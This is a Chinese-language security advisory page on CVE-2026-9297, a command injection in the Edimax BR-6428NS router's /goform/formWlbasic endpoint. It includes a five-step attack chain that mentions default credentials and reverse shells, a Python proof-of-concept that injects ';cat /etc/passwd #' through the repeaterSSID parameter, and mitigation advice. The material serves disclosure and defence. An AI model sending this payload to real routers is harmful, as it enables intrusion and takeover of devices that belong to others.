IPBUF安全漏洞报告
English
CVE-2026-9297 CVSS 6.3 中危

CVE-2026-9297 Edimax BR-6428NS formWlbasic命令注入漏洞

披露日期: 2026-05-23

漏洞信息

漏洞编号
CVE-2026-9297
漏洞类型
命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Edimax BR-6428NS

相关标签

命令注入路由器漏洞EdimaxBR-6428NSCVE-2026-9297Web安全IoT漏洞固件漏洞

漏洞概述

CVE-2026-9297是Edimax BR-6428NS 1.10版本路由器中存在的一个命令注入漏洞。该漏洞位于Web管理界面的/goform/formWlbasic端点,攻击者可以通过构造恶意的POST请求,在repeaterSSID参数中注入系统命令。由于该漏洞无需用户交互即可远程利用,且攻击者只需低权限认证即可触发,因此具有较高的实际威胁性。Edimax厂商在收到漏洞通知后未作出任何回应,导致该漏洞处于无补丁状态。攻击者可以利用此漏洞在路由器上执行任意系统命令,从而完全控制设备、窃取网络流量或将其纳入僵尸网络。

技术细节

该漏洞源于Edimax BR-6428NS路由器Web管理接口中的formWlbasic函数对用户输入的repeaterSSID参数缺乏有效的输入验证。攻击者可以在POST请求中构造包含命令分隔符(如分号、管道符等)的恶意载荷,当路由器处理该请求时,未经过滤的用户输入会被直接拼接到系统命令中执行。例如,攻击者可以注入'ls'、'cat /etc/passwd'等系统命令,或通过反弹shell获取持久化访问。漏洞影响无线网络中继器SSID配置功能,攻击者可利用此功能在设备上执行任意代码,实现对路由器的完全控制。

攻击链分析

STEP 1
步骤1
扫描识别运行Edimax BR-6428NS固件版本1.10的路由器,默认管理端口为80
STEP 2
步骤2
访问路由器Web管理界面,使用低权限凭据登录(如admin/admin)
STEP 3
步骤3
构造恶意POST请求到/goform/formWlbasic端点,在repeaterSSID参数中注入系统命令
STEP 4
步骤4
发送请求后,路由器将注入的命令拼接到系统调用中执行,攻击者获得命令执行结果
STEP 5
步骤5
通过反弹shell或下载恶意脚本,实现持久化访问和进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2026-9297 PoC - Edimax BR-6428NS Command Injection # Target: Edimax BR-6428NS 1.10 # Endpoint: /goform/formWlbasic target_ip = "192.168.1.1" # Router IP target_url = f"http://{target_ip}/goform/formWlbasic" # Malicious payload to inject command via repeaterSSID parameter # This PoC demonstrates command injection in repeaterSSID parameter payload = { "repeaterSSID": ";cat /etc/passwd #" } try: # Send POST request with malicious payload response = requests.post(target_url, data=payload, timeout=10) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") except requests.exceptions.RequestException as e: print(f"Request failed: {e}")

影响范围

Edimax BR-6428NS 1.10

防御指南

临时缓解措施
由于Edimax厂商未响应漏洞披露,建议立即采取以下措施:1) 在防火墙层面禁止外部网络访问路由器管理界面;2) 修改默认管理密码并使用强密码;3) 监控路由器异常行为;4) 如条件允许,考虑更换设备;5) 在不影响业务的前提下,关闭无线中继功能以减少攻击面。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表